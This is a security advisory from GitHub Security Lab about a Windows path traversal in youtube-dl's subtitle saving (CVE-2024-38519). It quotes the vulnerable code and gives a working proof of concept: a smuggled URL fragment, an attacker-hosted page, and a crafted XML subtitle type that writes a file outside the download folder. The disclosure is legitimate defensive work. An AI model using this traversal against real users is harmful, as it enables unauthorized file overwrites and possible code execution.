Coordinated Disclosure Timeline
- 2024-05-24: The report was sent to the maintainer.
- 2024-07-03: v2024.07.03 with the fix was released.
- 2024-07-03: The advisory was published.
Summary
youtube-dl
doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.
Project
youtube-dl
Tested Version
The nightly v2024.05.16 and the last official v2021.12.17.
Details
Path traversal saving subtitles (GHSL-2024-089
)
youtube-dl
is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-sub
, --write-auto-sub
, or --all-subs
option. Each supported video website has a dedicated extractor. Some extractors provide only urls of subtitles and youtube-dl resolves their extension from the url path. Others provide the urls and the subtitle extensions explicitly. In turn, some of the latter extractors validate the extracted subtitle extension, but others trust the extracted value blindly. youtube-dl honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. The filename
is the generated name for the video file, sub_lang
is en
by default, sub_format
is the extracted subtitles extension and info_dict.get('ext')
contains the video file extension to replace with the sub_format
in subtitles_filename
. The subtitle is written as a binary file in [2]. The encodeFilename
is just a wrapper for Unicode support that does nothing in Python 3. If the user doesn’t override the default output file template %(title)s-%(id)s.%(ext)s
, then the sub_filename
is formatted as %(title)s-%(id)s.%(sub_lang).%(sub_format)s
. The path traversal injection in sub_format
doesn’t work on Linux because Linux doesn’t accept paths like not_existing_folder/../../file
. But it does work on Windows.
if subtitles_are_requested and info_dict.get('requested_subtitles'):
# subtitles download errors are already managed as troubles in relevant IE
# that way it will silently go on when used with unsupporting IE
subtitles = info_dict['requested_subtitles']
ie = self.get_info_extractor(info_dict['extractor_key'])
for sub_lang, sub_info in subtitles.items():
sub_format = sub_info['ext']
sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
if self.params.get('nooverwrites', False) and os.path.exists(encodeFilename(sub_filename)):
self.to_screen('[info] Video subtitle %s.%s is already present' % (sub_lang, sub_format))
else:
self.to_screen('[info] Writing video subtitles to: ' + sub_filename)
if sub_info.get('data') is not None:
#...
else:
try:
sub_data = ie._request_webpage(
sub_info['url'], info_dict['id'], note=False).read()
with open(encodeFilename(sub_filename), 'wb') as subfile: # <------------- [2]
subfile.write(sub_data)
except (ExtractorError, IOError, OSError, ValueError) as err:
self.report_warning('Unable to download subtitle for "%s": %s' %
(sub_lang, error_to_compat_str(err)))
continue
Exploitability and Proof of Concept (PoC)
Intentionally crafted subtitle extension names in a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of the report. However it is possible that the websites may be compromised at some moment of time. An XSS or SQL injection would allow the attacker to exploit a specific youtube-dl extractor. Then the attacker would need to wait for any youtube-dl user or trick a specific youtube-dl user to download the video with subtitles. However other youtube-dl features allow exploitation without compromising the video hosting website:
- URL smuggling. Some youtube-dl extractors attempt to get additional information from the URL part that comes after
#
- the fragment. The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1] and retrievesbase_url
from it [2] and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked to run, for example,youtube-dl --write-sub https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D
it will use an XML file from an attacker controlled site,site.com
in this case, to extract subtitles and video files.url, smuggled_data = unsmuggle_url(url, {}) <------------- [1] mobj = re.match(self._VALID_URL, url) course_id = mobj.group('course_id') video_id = mobj.group('id') base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id) <------------- [2] settings = self._download_xml( '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id), <------------- [3] video_id, 'Downloading video settings XML')
- Generic extractor.
youtube-dl
allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a youtube-dl user. The user needs to run onlyyoutube-dl --write-sub https://attacker.com/poc.html
For a PoC:
- Create a folder with the following
poc.html
:
<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
- Create two subfolders
content/content_gfVXISmEB_6804984382
in the folder wherepoc.html
resides. - Create the following
videosettings.xml
in thecontent_gfVXISmEB_6804984382
folder:
<videoSettings version="1.5">
<PlaylistItems>
<PlaylistItem>
<MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
<MediaSource />
<Title>01 | Introduction</Title>
<MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
<ThumbSource />
</PlaylistItem>
</PlaylistItems>
</videoSettings>
- Create arbitrary file
subtitles
in thecontent_gfVXISmEB_6804984382
folder. - Host the folder with
poc.html
withpython3 -m http.server
- On Windows run
youtube-dl --write-sub http://127.0.0.1:8000/poc.html
youtube-dl
creates a filepoc.bin
one level up from the current folder as long as the running user has sufficient permissions.
Impact
This issue may lead to unauthorized file system modification and later may lead to remote code execution if an executable file is overwritten.
CVE
- CVE-2024-38519
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2024-089
in any communication regarding this issue.